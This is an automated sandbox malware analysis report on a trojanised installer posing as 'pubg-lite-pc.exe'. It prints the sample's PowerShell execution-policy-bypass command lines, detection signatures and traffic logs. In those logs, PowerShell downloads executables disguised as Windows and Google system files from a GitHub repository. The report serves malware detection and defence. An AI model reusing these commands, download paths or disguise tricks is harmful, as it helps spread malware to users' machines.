Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pubg-lite-pc.exe

Overview

General Information

Sample Name:pubg-lite-pc.exe
Analysis ID:681507
MD5:f4cb6419f1f44ee47cf33faabf672a48
SHA1:e0864f7f7421de374bf9377e4ac0f882396d13d2
SHA256:45c174aea886470795ec2a23ad391c5d724827cd8e59d83768aaee77c8a9cce1
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Bypasses PowerShell execution policy
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Checks for available system drives (often done to infect USB drives)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64native
  • pubg-lite-pc.exe (PID: 2500 cmdline: "C:\Users\user\Desktop\pubg-lite-pc.exe" MD5: F4CB6419F1F44EE47CF33FAABF672A48)
    • msiexec.exe (PID: 400 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 4224 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5768 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E82FFD10FEB1CBA14CC59B611B5F4838 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6564 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 974E8FDD22F5719B9917619AF3E37DCB MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 2140 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 2620 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7608 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5736 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 2368 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7608PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x13428:$sa2: -encodedCommand
  • 0x13454:$sa2: -encodedCommand
  • 0x13b72:$sa2: -EncodedCommand
  • 0x1467c:$sa2: -EncodedCommand
  • 0x14717:$sa2: -encodedCommand
  • 0x1507:$sc2: -NoProfile
  • 0x1651:$sc2: -NoProfile
  • 0x1cf4:$sc2: -NoProfile
  • 0x205c:$sc2: -NoProfile
  • 0x299f:$sc2: -NoProfile
  • 0x2ced:$sc2: -NoProfile
  • 0xd311:$sc2: -NoProfile
  • 0x21351:$sc2: -NoProfile
  • 0x236c1:$sc2: -NoProfile
  • 0x27fb8:$sc2: -NoProfile
  • 0x94b60:$sc2: -NoProfile
  • 0x9ade5:$sc2: -NoProfile
  • 0xb0861:$sc2: -NoProfile
  • 0xb5c54:$sc2: -NoProfile
  • 0xb6051:$sc2: -NoProfile
  • 0xb63d2:$sc2: -NoProfile

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.11.203.227.31.21149811802849814 08/10/22-06:48:01.939243
SID:2849814
Source Port:49811
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.11.203.227.31.21149811802849813 08/10/22-06:48:01.939243
SID:2849813
Source Port:49811
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.11.203.227.31.21149810802849813 08/10/22-06:48:01.629530
SID:2849813
Source Port:49810
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.11.203.227.31.21149810802849814 08/10/22-06:48:01.629530
SID:2849814
Source Port:49810
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: pubg-lite-pc.exeVirustotal: Detection: 17%Perma Link
Antivirus / Scanner detection for submitted sample
Source: pubg-lite-pc.exeAvira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
Source: pubg-lite-pc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: pubg-lite-pc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: pubg-lite-pc.exe, 00000001.00000003.64957498013.0000000005F83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: pubg-lite-pc.exe, 00000001.00000003.64935232297.00000000014DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: pubg-lite-pc.exe, 00000001.00000003.64935232297.00000000014DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbj source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationlib.pdb source: powershell.exe, 00000016.00000003.65653971086.000002B47F99C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.65297522924.0000020D99ACA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65650615625.000002B419E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.66086099097.0000024B7ABE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913103767.0000024B7ABC2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbRoot source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs& source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbl source: pubg-lite-pc.exe, 00000001.00000000.64931774401.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp, pubg-lite-pc.exe, 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n.pdb~ source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbG{y source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: pubg-lite-pc.exe, 00000001.00000000.64931774401.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp, pubg-lite-pc.exe, 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbB source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbq source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb1&0 source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.65818234743.000002B419B65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65918521662.0000024B7AC01000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdbe source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdbT source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000003.65649868815.000002B419DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbW source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wininet.pdbUGP source: pubg-lite-pc.exe, 00000001.00000003.64957498013.0000000005F83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdboot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\Ap source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000016.00000003.65651272704.000002B419E52000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65822692856.000002B419E5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt1&0 source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb|A source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65293854575.0000020D9973A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: ion.pdbx source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll? source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089Q source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb^ source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65297522924.0000020D99ACA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65294289062.0000020D99761000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651739159.000002B419E6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913272165.0000024B7ABC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbdb source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089g source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000003.65651739159.000002B419E6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbcal\@ source: powershell.exe, 00000016.00000003.65650615625.000002B419E30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbon PCA 2011 source: powershell.exe, 00000018.00000002.66085246807.0000024B7AB5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbK source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: d:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B34A0 FindFirstFileW,GetLastError,FindClose,1_2_009B34A0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DA750 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,1_2_009DA750
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009EE850 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,1_2_009EE850
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DAB50 FindFirstFileW,FindClose,1_2_009DAB50
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B2B40 FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,1_2_009B2B40
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B2ED0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,1_2_009B2ED0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009D0F10 FindFirstFileW,FindClose,1_2_009D0F10
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009CF3B0 FindFirstFileW,FindClose,DeleteFileW,GetLastError,1_2_009CF3B0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DD4E0 FindFirstFileW,FindClose,1_2_009DD4E0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009BB850 FindFirstFileW,FindClose,FindClose,1_2_009BB850
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B7E80 FindFirstFileW,FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,1_2_009B7E80
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D982CF0 FindFirstFileW,FindClose,GetLastError,FindClose,1_2_6D982CF0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009D99D0 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,1_2_009D99D0

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.11.20:49810 -> 3.227.31.211:80
Source: TrafficSnort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.11.20:49810 -> 3.227.31.211:80
Source: TrafficSnort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.11.20:49811 -> 3.227.31.211:80
Source: TrafficSnort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.11.20:49811 -> 3.227.31.211:80
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
